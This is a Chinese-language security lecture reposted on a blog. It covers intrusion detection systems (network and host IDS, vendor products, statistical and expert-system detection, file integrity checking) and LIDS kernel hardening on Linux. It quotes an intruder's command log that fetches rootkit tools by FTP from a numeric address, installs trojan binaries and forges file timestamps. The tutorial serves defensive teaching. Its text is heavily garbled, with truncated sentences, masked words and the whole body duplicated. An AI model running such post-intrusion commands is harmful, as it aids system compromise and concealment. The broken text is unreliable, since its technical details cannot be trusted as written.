网络安全讲座之八:IDS系统
2008-03-25 21:28
246 查看
我们已经接触了手工和自动运行的扫描程序。这些工具在审计过程中是非常有用的。你还使用了包嗅探器,这是另一个确定网络中存在哪些活动类型的工具。***监测系统会在两方面引起你的注意。首先,这种保护网络的形式变得越来越流行。你需要了解网络当前的结构来确定配置是否合适。第二,你可能在推荐这种产品,因此,你必须知道如何为特殊的网络情况推荐这种产品。
在测试过程中你可以使用多种类型的工具。这些工具在整个的审计过程中是必不可少的。它们会帮助你在枯燥乏味的分析过程中节省时间。
什么是***监测
***监测系统处于防火墙之后对网络活动进行实时检测。许多情况下,由于可以记录和禁止网络活动,所以***监测系统是防火墙的延续。它们可以和你的防火墙和路由器配合工作。例如,你的IDS可以重新配置来禁止从防火墙外部进入的恶意流量。你应当理解***监测系统是独立于防火墙工作的。
***监测系统IDS与系统扫描器system scanner不同。系统扫描器是根据***特征数据库来扫描系统漏洞的,它更关注配置上的漏洞而不是当前进出你的主机的流量。在遭受***的主机上,即使正在运行着扫描程序,也无法识别这种***。
IDS扫描当前网络的活动,监视和记录网络的流量,根据定义好的规则来过滤从主机网卡到网线上的流量,提供实时报警。网络扫描器检测主机上先前设置的漏洞,而IDS监视和记录网络流量。如果在同一台主机上运行IDS和扫描器的话,配置合理的IDS会发出许多报警。
***监测的功能
大多数的IDS程序可以提供关于网络流量非常详尽的分析。它们可以监视任何定义好的流量。大多数的程序对FTP,HTTP和Telnet流量都有缺省的设置,还有其它的流量像NetBus,本地和远程登录失败等等。你也可以自己定制策略。下面讨论一些更常见的检测技巧。
网络流量管理
像Computer Associates’ eTrust Intrusion Detection(以前是SessionWall),Axent Intruder Alert和ISS RealSecure等IDS程序允许你记录,报告和禁止几乎所有形式的网络访问。你还可以用这些程序来监视某一台主机的网络流量,eTrust Intrusion Detection可以读取这台主机上用户最后访问的Web页。
如果你定义了策略和规则,便可以获得FTP,SMTP,Telnet和任何其它的流量。这种规则有助于你追查该连接和确定网络上发生过什么,现在正在发生什么。这些程序在你需要确定网络中策略实施的一致性情况时是非常有效的工具。
虽然IDS是安全管理人员或审计人员非常有价值的工具,但公司的雇员同样可以安装像eTrust Intrusion Detection或Intrude Alert这样的程序来访问重要的信息。***者不仅可以读取未加密的邮件,还可以嗅探密码和收集重要的协议方面的信息。所以,你首要的工作是要检查在网络中是否有类似的程序在运行。
系统扫描,Jails和IDS
在本教程的早些时候,你学习到如何应用不同的策略来加强有效的安全。这项任务需要在网络中不同的部分实施控制,从操作系统到扫描器、IDS程序和防火墙。你已经使用过系统扫描器,许多安全专家将这些程序和IDS结合起来。系统完整性检查,广泛地记录日志,***“监狱”和引诱程序都是可以同IDS前后配合的有效工具。
追踪
IDS所能做到的不仅仅是记录事件,它还可以确定事件发生的位置,这是许多安全专家购买IDS的主要原因。通过追踪来源,你可以更多的了解***者。这些经验不仅可以帮你记录下***过程,同时也有助于确定解决方案。
***监测系统的必要性
防火墙看起来好像可以满足系统管理员的一切需求。然而,随着基于雇员的***行为和产品自身问题的增多,IDS由于能够在防火墙内部监测非法的活动正变得越来越必要。新的技术同样给防火墙带来了严重的威胁。例如,***可穿透防火墙,所以需要IDS在防火墙后提供安全保障。虽然***本身很安全,但有可能通过***进行通信的其中一方被root kit或NetBus所控制,而这种破坏行为是防火墙无法抵御的。基于以上两点原因,IDS已经成为安全策略的重要组成部分。
我们还需要注意的是,***者可以实施***使IDS过载,其结果可能是IDS系统成为拒绝服务***的参与者。而且,***者会尽量调整***手法,从而使IDS无法追踪网络上的活动。
***监测系统的构架
有两种构架的IDS可供选择,每种都有它的适用环境。虽然主机级的IDS具有更强的功能而且可以提供更详尽的信息,但它并不总是最佳选择。
网络级IDS
你可以使用网络级的产品,象eTrust Intrusion Detection只需一次安装。程序(或服务)会扫描整个网段中所有传输的信息来确定网络中实时的活动。网络级IDS程序同时充当管理者和代理的身份,安装IDS的主机完成所有的工作,网络只是接受被动的查询。
优点和缺点
这种***监测系统很容易安装和实施;通常只需要将程序在主机上安装一次。网络级的IDS尤其适合阻止扫描和拒绝服务***。但是,这种IDS构架在交换和ATM环境下工作得不好。而且,它对处理升级非法账号,破坏策略和篡改日志也并不特别有效。在扫描大型网络时会使主机的性能急剧下降。所以,对于大型、复杂的网络,你需要主机级的IDS。
主机级IDS
像前面所讲的,主机级的IDS结构使用一个管理者和数个代理。管理者向代理发送查询请求,代理向管理者汇报网络中主机传输信息的情况。代理和管理者之间直接通信,解决了复杂网络中的许多问题。
技术提示:在应用任何主机级IDS之前,你需要在一个隔离的网段进行测试。这种测试可以帮助你确定这种Manager-to-agent的通信是否安全,以及对网络带宽的影响。
管理者Managers
管理者定义管理代理的规则和策略。管理者安装在一台经过特殊配置过的主机上,对网络中的代理进行查询。有的管理者具有图形界面儿其它的IDS产品只是以守护进程的形式来运行管理者,然后使用其它程序来管理它们。
物理安全对充当管理者的主机来说至关重要。如果***者可以获得硬盘的访问权,他便可以获得重要的信息。此外,除非必需管理者的系统也不应被网络用户访问到,这种限制包括Internet访问。
安装管理者的操作系统应该尽可能的安全和没有漏洞。有些厂商要求你使用特定类型的操作系统来安装管理者。例如,ISS RealSecure要求你安装在Windows NT Workstation而不是Windows NT Server,这是由于在NT Workstation上更容易对操作系统进行精简。
特殊的考虑
每种IDS厂商对他们的产品都有特殊的考虑。通常这些考虑是针对操作系统的特殊设置的。例如,许多厂商要求你将代理安装在使用静态IP地址的主机上。因此,你也许需要配置DHCP和WINS服务器来配合管理者。这种特殊的考虑在一定程度上解释了为什么大多数IDS程序用一个管理者来管理数台主机。另外,安装管理者会降低系统的性能。而且,在同一网段中安装过多的管理者会占用过多的带宽。
另外,许多IDS产品在快于10MB的网络中工作起来会有问题。通常IDS的厂商要求你不要将管理者安装在使用NFS或NFS+的UNIX操作系统上,因为这种文件系统允许远程访问,管理者会使它们缺乏稳定和不安全。
或BDC或BDC 管理者和代理的比例
或NT网络中每个管理者不应使用超过50可以在不影响正常地网络操作的前提下实时监测网络***。
允许你将代理安装在任何可以接受配置的主机上。当你在考虑产品时,你应当确保它可以和网络上的主机配合工作。大多数的产品在UNIX,NT,mainframes 请考虑将代理安装在像数据库,Web这样的基于扫描的IDS ·账号、人力资源和研发数据库
·SMTP服务器
·文件服务器
管理者和代理的通信
程序要求你首先和管理者通信,然后管理者会查询代理。
位长Diffie-Helman位的加密。比较这两种标准,你可以发现大多数的IDS和Man-in-the-middle(ITA 审计管理者和代理的通信
基于网络的***检测产品和基于主机的***检测产品都有不足之处,单纯使用一类产品会造成主动防御体系不全面。但是,它们的缺憾是互补的。如果这两类产品能够无缝结合起来部署在网络内,则会构架成一套完整立体的主动防御体系,综合了基于网络和基于主机两种结构特点的***检测系统,既可发现网络中的***信息,也可从系统日志中发现异常情况。
建立规则。大多数的IDS 不同厂商在使用审计的术语时有所差别。例如,eTrust Intrusion Detection却使用“policies”时意味更深远,它允许你为个别策略建立规则。因此,在理解各个厂商的产品时,不要被术语所迷惑。
程序会报告协议级别的异常情况。如果配置正确的话,它可以提示你有关NetBus***。例如,如果存在过多的SYN 网络误用监测
服务),和玩儿游戏(如Doom”系统或网络进行诱导。
常用检测方法
%是采用概率统计的统计检测产品与基于日志的专家知识库系产品。
||||||种统计模型为:
2、多元模型,操作模型的扩展,通过同时分析多个参数实现检测;
5 专家系统
结构(也可以是复合结构),条件部分为***特征,then 文件完整性检查系统检查计算机中自上次检查后文件变化情况。文件完整性检查系统保存有每个文件的数字文摘数据库,每次检查时,它重新计算文件的数字文摘并将它与数据库中的值相比较,如不同,则文件已被修改,若相同,文件则未发生变化。
函数计算结果是一个固定长度的数字。与加密算法不同,Hash、SHA。
文件完整性检查系统具有相当的灵活性,可以配置成为监测系统中所有文件或某些重要文件。
文件完整性检查系统依赖于本地的文摘数据库。与日志文件一样,这些数据可能被***者修改。当一个***者取得管理员权限后,在完成破坏活动后,可以运行文件完整性检查系统更新数据库,从而瞒过系统管理员。当然,可以将文摘数据库放在只读的介质上,但这样的配置不够灵活性。
系统有些正常的更新操作可能会带来大量的文件更新,从而产生比较繁杂的检查与分析工作,如,在Windows NT多个文件变化。
在大多数的IDS ·需要做日志记录的和禁止的主机。你可以指定某台主机或某一范围内的主机。
·对发生的事件如何反应,包括:
连接日志记录机制
·SNMP程序要求你先建立规则,进而赋予动作。你可以自己定义规则。然而,大多数的IDS 如同实施防火墙,IDS 然而,完全忽略误报是不明智的。IDS和某些UNIX连接。虽然你需要对误报引起重视,但你还必须培养识别何时忽略误报何时认真对待它们的能力。网络级的IDS ***检测产品选择要点
1. 2. 3. 秒 PPS)或2M该产品容易被躲避吗
分段、慢扫描、协同***等。
系统支持的传感器数目、最大数据库大小、传感器与控制台之间通信带宽和对审计日志溢出的处理。
产品报表结构、处理误报的方便程度、事件与事志查询的方便程度以及使用该系统所需的技术人员数量。
不同厂商对检测特征库大小的计算方法都不一样,所以不能偏听一面之辞。
要从本地、远程等多个角度考察。自动更改防火墙配置是一个听上去很“酷”的功能,但是,自动配置防火墙可是一个极为危险的举动。
主要的权威测评机构有:国家信息安全测评认证中心、公安部计算机信息系统安全产品质量监督检验中心。
***或***的综合化与复杂化。***的手段有多种,***者往往采取一种***手段。由于网络防范技术的多重化,***的难度增加,使得***者在实施***或***时往往同时采取多种***的手段,以保证***的成功几率,并可在***实施的初期掩盖***或***的真实目的。
***或***技术的分布化。以往常用的***与***行为往往由单机执行。由于防范技术的发展使得此类行为不能奏效。所谓的分布式拒绝服务(DDoS作***的报道。***者详细地分析了IDS 今后的***检测技术大致可朝下述三个方向发展。
智能化***检测
即使用安全工程风险管理的思想与方法来处理网络安全问题,将网络安全作为一个整体工程来处理。从管理、网络结构、加密通道、防火墙、病毒防护、***检测多方位全面对所关注的网络作全面的评估,然后提出可行的全面解决方案。
基于内核的***检测是一种相当巧妙的新型的Linux 什么是LIDS内核的***检测和预防系统。
的篡改系统重要部分的。LIDS、修改防火墙的配置文件。
LIDS要复杂一点,但是很幸运的是,在LIDS 首先,在安装之前,我们需要大部分最新的LIDS主页上下载的2.2.14-12主要是适用于2.2.14上面安装了LIDS下载了最新的内核版本,并且依照http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html rpm -Uhv kernel-source-2.2.14-12.i386.rpm cd /usr/local/src/security/lids-0.9/lidsadm-0.9make
口令,这个以后将会在安装进内核的:
,得到秘钥"d502d92bfead11d1ef17887c9db07a78108859e8"目录下面:
下面我们就使用下面的命令来安装LIDS patch -p0 发布的标准的2.2.14发布的标准的lids-0.9-2.2.14.patch 最后,就是配置、编译和安装内核了:
make
配置选项:
[*] Security alert when execing unprotected programs before sealing
[*] Try not to flood logs
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
[*] Allow remote users to switch LIDS protections
[ ] Hide some known processes
--- Special authorizations
[ ] Allow some known processes to access io ports
[*] Allow some known processes to unmount devices
[*] Allow some known processes to kill init children
看得出,我没有使用UPS
来配置LIDS可以获得一些关于如何使用lidsadm保护文件的例子,例如:
整个目录,并且表示只读。
lidsadm -Zlidsadm -A -r /usr/bin
lidsadm -A -r /sbin
lidsadm -A -r /etc/sysconfig
,这样就能有效的在内核中启动LIDS的末尾,这样能够保证LIDS的脚本:
+INIT_CHILDREN_LOCK
的RPMS的新内核能够正常的启动。在下次重启之后,LIDS /sbin/lidsadm -S -- -LIDS的口令,当时在编译内核的时候在内核中加入了RipeMD-160脚本/etc/rc.d/init.d/halt的保护作用,其他的进程都没有权限来杀掉init()不能卸载模块的出错信息。这个主要是由于LIDS这个文件来防止出错信息继续发生。
的一系列特性。而我认为下面的这些特性是最重要的:
防止被写; CAP_NET_ADMIN 防止内核模块被插入或者移除;CAP_SYS_RAWIO CAP_SYS_ADMIN 无论在哪个点,上面这些特性都能够通过命令"lidsadm -I"口令(是通过RipeMD-160 当***把一些系统守护进程的缓冲区溢出以后就可以获得root最新的关于缓冲区溢出的补丁程序,并且让系统一直运行着)。当然一些***也不够小心,当他们侵入主机后,很急切的获得了shell就可以了解***到底怎么机器上面作了一些什么事情。这个文件我们可以看看(为了更加简单我们做过一些细微的修改): mkdir /usr/lib/... ; cd /usr/lib/...ftp 200.192.58.201 21
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
chmod +x *
/usr/lib/pt07
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /usr/bin/pstree
killall -HUP inetd
),接着***telnet某个地方的拨号用户),同时下载了一套***工具。这些***工具尸没有经过压缩的,中间的一些特洛伊二进制程序被安装到了系统中了,这些特洛伊程序覆盖了系统的netstat, syslogd 我们从中能学到什么呢?
权限。一旦系统没有******,我们看看LIDS通过CAP_LINUX_IMMUTABLE,/usr/sbin),因而也不会被修改。我们可以注意到,就算不使用LIDS以后,即使是root这个命令也会失败。甚至第一行的"mkdir /etc/lib"不能防止******,但是可以防止***的***在侵入后进行很大的系统破坏。一个后门程序可以被安装上系统,但是没有特洛亦版本的ps能够很早的发现这个后门进程,然后kill OpenWall 另外一个和LIDS工程在很多地方和LIDS的README中指出一个函数的返回地址,通常是system()字符串。
+OpenWall都具备的特性。
用户还是非root 突出的IDS和Platinum Technology ·ISS RealSecure(http://www.iss.net/)
·Computer Misuse Detection System(http://www.cmds.net/)
’ CyberCop Monitor(http://www.networkassociates.com)
是使用管理者/和Novell应该可以适用于尽可能多的厂商的产品。
软件包由两个服务和三个应用程序组成:
的可装载的模块)
的可装载的模块)
·ITA View(从管理者域中添加和删除代理的程序)
一旦你定义了策略,便可以开始使用它。你可以观看在Policy Library tree ITA View列出了你可能增添到缺省域中的策略。当然,你可以重命名这些缺省的域,也可以增加新的域。第四个tree的管理者名称(如Student10 同eTrust Intrusion Detection监测哪些网络和主机以及采取哪些行为有所帮助。所有ITA连接或Land针对你定义好的规则来实施特殊的行为。一旦你使用一个Select 然而,ITA将忽略任何你放在Ignore对你所定义的事件采取什么行为。如果你把相同的事件同时置于Ignore不会对该事件采取行动。通常,Ignore逻辑。如果Select和Action将事件记录到日志文件中,而且Ignore段中定义的规则。
到100的值表示这条规则是个警告,34到100 Indirect, Filter在应用规则时进行附加控制的。Indirect选项将被其它规则检测到的事件删除掉,Disable 进行查询
的主界面,单击New)
在连接好代理后,你可以开始进行查询。你的查询受限于你在ITA View 购买IDS
问题
产品培训
管理者和代理升级的频率有多快?升级需要花费吗?第一年的升级是免费的吗?如何通知进行升级?有没有对升级的建议过程?
IDS饱和前能处理的流量?如何通知我这些问题?
可以处理多少种***特征和策略?策略能够细致到什么程度?我可以自己制定策略吗?产品研发的时间有多长?
系统支持得最好?在UNIX,Novell漏洞?可以支持那种操作系统或设备(如路由器)。
管理者和代理是否使用公钥加密?使用哪种公钥?
建立基线是你在审计过程中应当采取的第一步。在建立基线时,先在网络活动的峰值期间运行IDS
在测试过程中你可以使用多种类型的工具。这些工具在整个的审计过程中是必不可少的。它们会帮助你在枯燥乏味的分析过程中节省时间。
什么是***监测
***监测系统处于防火墙之后对网络活动进行实时检测。许多情况下,由于可以记录和禁止网络活动,所以***监测系统是防火墙的延续。它们可以和你的防火墙和路由器配合工作。例如,你的IDS可以重新配置来禁止从防火墙外部进入的恶意流量。你应当理解***监测系统是独立于防火墙工作的。
***监测系统IDS与系统扫描器system scanner不同。系统扫描器是根据***特征数据库来扫描系统漏洞的,它更关注配置上的漏洞而不是当前进出你的主机的流量。在遭受***的主机上,即使正在运行着扫描程序,也无法识别这种***。
IDS扫描当前网络的活动,监视和记录网络的流量,根据定义好的规则来过滤从主机网卡到网线上的流量,提供实时报警。网络扫描器检测主机上先前设置的漏洞,而IDS监视和记录网络流量。如果在同一台主机上运行IDS和扫描器的话,配置合理的IDS会发出许多报警。
***监测的功能
大多数的IDS程序可以提供关于网络流量非常详尽的分析。它们可以监视任何定义好的流量。大多数的程序对FTP,HTTP和Telnet流量都有缺省的设置,还有其它的流量像NetBus,本地和远程登录失败等等。你也可以自己定制策略。下面讨论一些更常见的检测技巧。
网络流量管理
像Computer Associates’ eTrust Intrusion Detection(以前是SessionWall),Axent Intruder Alert和ISS RealSecure等IDS程序允许你记录,报告和禁止几乎所有形式的网络访问。你还可以用这些程序来监视某一台主机的网络流量,eTrust Intrusion Detection可以读取这台主机上用户最后访问的Web页。
如果你定义了策略和规则,便可以获得FTP,SMTP,Telnet和任何其它的流量。这种规则有助于你追查该连接和确定网络上发生过什么,现在正在发生什么。这些程序在你需要确定网络中策略实施的一致性情况时是非常有效的工具。
虽然IDS是安全管理人员或审计人员非常有价值的工具,但公司的雇员同样可以安装像eTrust Intrusion Detection或Intrude Alert这样的程序来访问重要的信息。***者不仅可以读取未加密的邮件,还可以嗅探密码和收集重要的协议方面的信息。所以,你首要的工作是要检查在网络中是否有类似的程序在运行。
系统扫描,Jails和IDS
在本教程的早些时候,你学习到如何应用不同的策略来加强有效的安全。这项任务需要在网络中不同的部分实施控制,从操作系统到扫描器、IDS程序和防火墙。你已经使用过系统扫描器,许多安全专家将这些程序和IDS结合起来。系统完整性检查,广泛地记录日志,***“监狱”和引诱程序都是可以同IDS前后配合的有效工具。
追踪
IDS所能做到的不仅仅是记录事件,它还可以确定事件发生的位置,这是许多安全专家购买IDS的主要原因。通过追踪来源,你可以更多的了解***者。这些经验不仅可以帮你记录下***过程,同时也有助于确定解决方案。
***监测系统的必要性
防火墙看起来好像可以满足系统管理员的一切需求。然而,随着基于雇员的***行为和产品自身问题的增多,IDS由于能够在防火墙内部监测非法的活动正变得越来越必要。新的技术同样给防火墙带来了严重的威胁。例如,***可穿透防火墙,所以需要IDS在防火墙后提供安全保障。虽然***本身很安全,但有可能通过***进行通信的其中一方被root kit或NetBus所控制,而这种破坏行为是防火墙无法抵御的。基于以上两点原因,IDS已经成为安全策略的重要组成部分。
我们还需要注意的是,***者可以实施***使IDS过载,其结果可能是IDS系统成为拒绝服务***的参与者。而且,***者会尽量调整***手法,从而使IDS无法追踪网络上的活动。
***监测系统的构架
有两种构架的IDS可供选择,每种都有它的适用环境。虽然主机级的IDS具有更强的功能而且可以提供更详尽的信息,但它并不总是最佳选择。
网络级IDS
你可以使用网络级的产品,象eTrust Intrusion Detection只需一次安装。程序(或服务)会扫描整个网段中所有传输的信息来确定网络中实时的活动。网络级IDS程序同时充当管理者和代理的身份,安装IDS的主机完成所有的工作,网络只是接受被动的查询。
优点和缺点
这种***监测系统很容易安装和实施;通常只需要将程序在主机上安装一次。网络级的IDS尤其适合阻止扫描和拒绝服务***。但是,这种IDS构架在交换和ATM环境下工作得不好。而且,它对处理升级非法账号,破坏策略和篡改日志也并不特别有效。在扫描大型网络时会使主机的性能急剧下降。所以,对于大型、复杂的网络,你需要主机级的IDS。
主机级IDS
像前面所讲的,主机级的IDS结构使用一个管理者和数个代理。管理者向代理发送查询请求,代理向管理者汇报网络中主机传输信息的情况。代理和管理者之间直接通信,解决了复杂网络中的许多问题。
技术提示:在应用任何主机级IDS之前,你需要在一个隔离的网段进行测试。这种测试可以帮助你确定这种Manager-to-agent的通信是否安全,以及对网络带宽的影响。
管理者Managers
管理者定义管理代理的规则和策略。管理者安装在一台经过特殊配置过的主机上,对网络中的代理进行查询。有的管理者具有图形界面儿其它的IDS产品只是以守护进程的形式来运行管理者,然后使用其它程序来管理它们。
物理安全对充当管理者的主机来说至关重要。如果***者可以获得硬盘的访问权,他便可以获得重要的信息。此外,除非必需管理者的系统也不应被网络用户访问到,这种限制包括Internet访问。
安装管理者的操作系统应该尽可能的安全和没有漏洞。有些厂商要求你使用特定类型的操作系统来安装管理者。例如,ISS RealSecure要求你安装在Windows NT Workstation而不是Windows NT Server,这是由于在NT Workstation上更容易对操作系统进行精简。
特殊的考虑
每种IDS厂商对他们的产品都有特殊的考虑。通常这些考虑是针对操作系统的特殊设置的。例如,许多厂商要求你将代理安装在使用静态IP地址的主机上。因此,你也许需要配置DHCP和WINS服务器来配合管理者。这种特殊的考虑在一定程度上解释了为什么大多数IDS程序用一个管理者来管理数台主机。另外,安装管理者会降低系统的性能。而且,在同一网段中安装过多的管理者会占用过多的带宽。
另外,许多IDS产品在快于10MB的网络中工作起来会有问题。通常IDS的厂商要求你不要将管理者安装在使用NFS或NFS+的UNIX操作系统上,因为这种文件系统允许远程访问,管理者会使它们缺乏稳定和不安全。
或BDC或BDC 管理者和代理的比例
或NT网络中每个管理者不应使用超过50可以在不影响正常地网络操作的前提下实时监测网络***。
允许你将代理安装在任何可以接受配置的主机上。当你在考虑产品时,你应当确保它可以和网络上的主机配合工作。大多数的产品在UNIX,NT,mainframes 请考虑将代理安装在像数据库,Web这样的基于扫描的IDS ·账号、人力资源和研发数据库
·SMTP服务器
·文件服务器
管理者和代理的通信
程序要求你首先和管理者通信,然后管理者会查询代理。
位长Diffie-Helman位的加密。比较这两种标准,你可以发现大多数的IDS和Man-in-the-middle(ITA 审计管理者和代理的通信
基于网络的***检测产品和基于主机的***检测产品都有不足之处,单纯使用一类产品会造成主动防御体系不全面。但是,它们的缺憾是互补的。如果这两类产品能够无缝结合起来部署在网络内,则会构架成一套完整立体的主动防御体系,综合了基于网络和基于主机两种结构特点的***检测系统,既可发现网络中的***信息,也可从系统日志中发现异常情况。
建立规则。大多数的IDS 不同厂商在使用审计的术语时有所差别。例如,eTrust Intrusion Detection却使用“policies”时意味更深远,它允许你为个别策略建立规则。因此,在理解各个厂商的产品时,不要被术语所迷惑。
程序会报告协议级别的异常情况。如果配置正确的话,它可以提示你有关NetBus***。例如,如果存在过多的SYN 网络误用监测
服务),和玩儿游戏(如Doom”系统或网络进行诱导。
常用检测方法
%是采用概率统计的统计检测产品与基于日志的专家知识库系产品。
||||||种统计模型为:
2、多元模型,操作模型的扩展,通过同时分析多个参数实现检测;
5 专家系统
结构(也可以是复合结构),条件部分为***特征,then 文件完整性检查系统检查计算机中自上次检查后文件变化情况。文件完整性检查系统保存有每个文件的数字文摘数据库,每次检查时,它重新计算文件的数字文摘并将它与数据库中的值相比较,如不同,则文件已被修改,若相同,文件则未发生变化。
函数计算结果是一个固定长度的数字。与加密算法不同,Hash、SHA。
文件完整性检查系统具有相当的灵活性,可以配置成为监测系统中所有文件或某些重要文件。
文件完整性检查系统依赖于本地的文摘数据库。与日志文件一样,这些数据可能被***者修改。当一个***者取得管理员权限后,在完成破坏活动后,可以运行文件完整性检查系统更新数据库,从而瞒过系统管理员。当然,可以将文摘数据库放在只读的介质上,但这样的配置不够灵活性。
系统有些正常的更新操作可能会带来大量的文件更新,从而产生比较繁杂的检查与分析工作,如,在Windows NT多个文件变化。
在大多数的IDS ·需要做日志记录的和禁止的主机。你可以指定某台主机或某一范围内的主机。
·对发生的事件如何反应,包括:
连接日志记录机制
·SNMP程序要求你先建立规则,进而赋予动作。你可以自己定义规则。然而,大多数的IDS 如同实施防火墙,IDS 然而,完全忽略误报是不明智的。IDS和某些UNIX连接。虽然你需要对误报引起重视,但你还必须培养识别何时忽略误报何时认真对待它们的能力。网络级的IDS ***检测产品选择要点
1. 2. 3. 秒 PPS)或2M该产品容易被躲避吗
分段、慢扫描、协同***等。
系统支持的传感器数目、最大数据库大小、传感器与控制台之间通信带宽和对审计日志溢出的处理。
产品报表结构、处理误报的方便程度、事件与事志查询的方便程度以及使用该系统所需的技术人员数量。
不同厂商对检测特征库大小的计算方法都不一样,所以不能偏听一面之辞。
要从本地、远程等多个角度考察。自动更改防火墙配置是一个听上去很“酷”的功能,但是,自动配置防火墙可是一个极为危险的举动。
主要的权威测评机构有:国家信息安全测评认证中心、公安部计算机信息系统安全产品质量监督检验中心。
***或***的综合化与复杂化。***的手段有多种,***者往往采取一种***手段。由于网络防范技术的多重化,***的难度增加,使得***者在实施***或***时往往同时采取多种***的手段,以保证***的成功几率,并可在***实施的初期掩盖***或***的真实目的。
***或***技术的分布化。以往常用的***与***行为往往由单机执行。由于防范技术的发展使得此类行为不能奏效。所谓的分布式拒绝服务(DDoS作***的报道。***者详细地分析了IDS 今后的***检测技术大致可朝下述三个方向发展。
智能化***检测
即使用安全工程风险管理的思想与方法来处理网络安全问题,将网络安全作为一个整体工程来处理。从管理、网络结构、加密通道、防火墙、病毒防护、***检测多方位全面对所关注的网络作全面的评估,然后提出可行的全面解决方案。
基于内核的***检测是一种相当巧妙的新型的Linux 什么是LIDS内核的***检测和预防系统。
的篡改系统重要部分的。LIDS、修改防火墙的配置文件。
LIDS要复杂一点,但是很幸运的是,在LIDS 首先,在安装之前,我们需要大部分最新的LIDS主页上下载的2.2.14-12主要是适用于2.2.14上面安装了LIDS下载了最新的内核版本,并且依照http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html rpm -Uhv kernel-source-2.2.14-12.i386.rpm cd /usr/local/src/security/lids-0.9/lidsadm-0.9make
口令,这个以后将会在安装进内核的:
,得到秘钥"d502d92bfead11d1ef17887c9db07a78108859e8"目录下面:
下面我们就使用下面的命令来安装LIDS patch -p0 发布的标准的2.2.14发布的标准的lids-0.9-2.2.14.patch 最后,就是配置、编译和安装内核了:
make
配置选项:
[*] Security alert when execing unprotected programs before sealing
[*] Try not to flood logs
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
[*] Allow remote users to switch LIDS protections
[ ] Hide some known processes
--- Special authorizations
[ ] Allow some known processes to access io ports
[*] Allow some known processes to unmount devices
[*] Allow some known processes to kill init children
看得出,我没有使用UPS
来配置LIDS可以获得一些关于如何使用lidsadm保护文件的例子,例如:
整个目录,并且表示只读。
lidsadm -Zlidsadm -A -r /usr/bin
lidsadm -A -r /sbin
lidsadm -A -r /etc/sysconfig
,这样就能有效的在内核中启动LIDS的末尾,这样能够保证LIDS的脚本:
+INIT_CHILDREN_LOCK
的RPMS的新内核能够正常的启动。在下次重启之后,LIDS /sbin/lidsadm -S -- -LIDS的口令,当时在编译内核的时候在内核中加入了RipeMD-160脚本/etc/rc.d/init.d/halt的保护作用,其他的进程都没有权限来杀掉init()不能卸载模块的出错信息。这个主要是由于LIDS这个文件来防止出错信息继续发生。
的一系列特性。而我认为下面的这些特性是最重要的:
防止被写; CAP_NET_ADMIN 防止内核模块被插入或者移除;CAP_SYS_RAWIO CAP_SYS_ADMIN 无论在哪个点,上面这些特性都能够通过命令"lidsadm -I"口令(是通过RipeMD-160 当***把一些系统守护进程的缓冲区溢出以后就可以获得root最新的关于缓冲区溢出的补丁程序,并且让系统一直运行着)。当然一些***也不够小心,当他们侵入主机后,很急切的获得了shell就可以了解***到底怎么机器上面作了一些什么事情。这个文件我们可以看看(为了更加简单我们做过一些细微的修改): mkdir /usr/lib/... ; cd /usr/lib/...ftp 200.192.58.201 21
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
chmod +x *
/usr/lib/pt07
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /usr/bin/pstree
killall -HUP inetd
),接着***telnet某个地方的拨号用户),同时下载了一套***工具。这些***工具尸没有经过压缩的,中间的一些特洛伊二进制程序被安装到了系统中了,这些特洛伊程序覆盖了系统的netstat, syslogd 我们从中能学到什么呢?
权限。一旦系统没有******,我们看看LIDS通过CAP_LINUX_IMMUTABLE,/usr/sbin),因而也不会被修改。我们可以注意到,就算不使用LIDS以后,即使是root这个命令也会失败。甚至第一行的"mkdir /etc/lib"不能防止******,但是可以防止***的***在侵入后进行很大的系统破坏。一个后门程序可以被安装上系统,但是没有特洛亦版本的ps能够很早的发现这个后门进程,然后kill OpenWall 另外一个和LIDS工程在很多地方和LIDS的README中指出一个函数的返回地址,通常是system()字符串。
+OpenWall都具备的特性。
用户还是非root 突出的IDS和Platinum Technology ·ISS RealSecure(http://www.iss.net/)
·Computer Misuse Detection System(http://www.cmds.net/)
’ CyberCop Monitor(http://www.networkassociates.com)
是使用管理者/和Novell应该可以适用于尽可能多的厂商的产品。
软件包由两个服务和三个应用程序组成:
的可装载的模块)
的可装载的模块)
·ITA View(从管理者域中添加和删除代理的程序)
一旦你定义了策略,便可以开始使用它。你可以观看在Policy Library tree ITA View列出了你可能增添到缺省域中的策略。当然,你可以重命名这些缺省的域,也可以增加新的域。第四个tree的管理者名称(如Student10 同eTrust Intrusion Detection监测哪些网络和主机以及采取哪些行为有所帮助。所有ITA连接或Land针对你定义好的规则来实施特殊的行为。一旦你使用一个Select 然而,ITA将忽略任何你放在Ignore对你所定义的事件采取什么行为。如果你把相同的事件同时置于Ignore不会对该事件采取行动。通常,Ignore逻辑。如果Select和Action将事件记录到日志文件中,而且Ignore段中定义的规则。
到100的值表示这条规则是个警告,34到100 Indirect, Filter在应用规则时进行附加控制的。Indirect选项将被其它规则检测到的事件删除掉,Disable 进行查询
的主界面,单击New)
在连接好代理后,你可以开始进行查询。你的查询受限于你在ITA View 购买IDS
问题
产品培训
管理者和代理升级的频率有多快?升级需要花费吗?第一年的升级是免费的吗?如何通知进行升级?有没有对升级的建议过程?
IDS饱和前能处理的流量?如何通知我这些问题?
可以处理多少种***特征和策略?策略能够细致到什么程度?我可以自己制定策略吗?产品研发的时间有多长?
系统支持得最好?在UNIX,Novell漏洞?可以支持那种操作系统或设备(如路由器)。
管理者和代理是否使用公钥加密?使用哪种公钥?
建立基线是你在审计过程中应当采取的第一步。在建立基线时,先在网络活动的峰值期间运行IDS
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐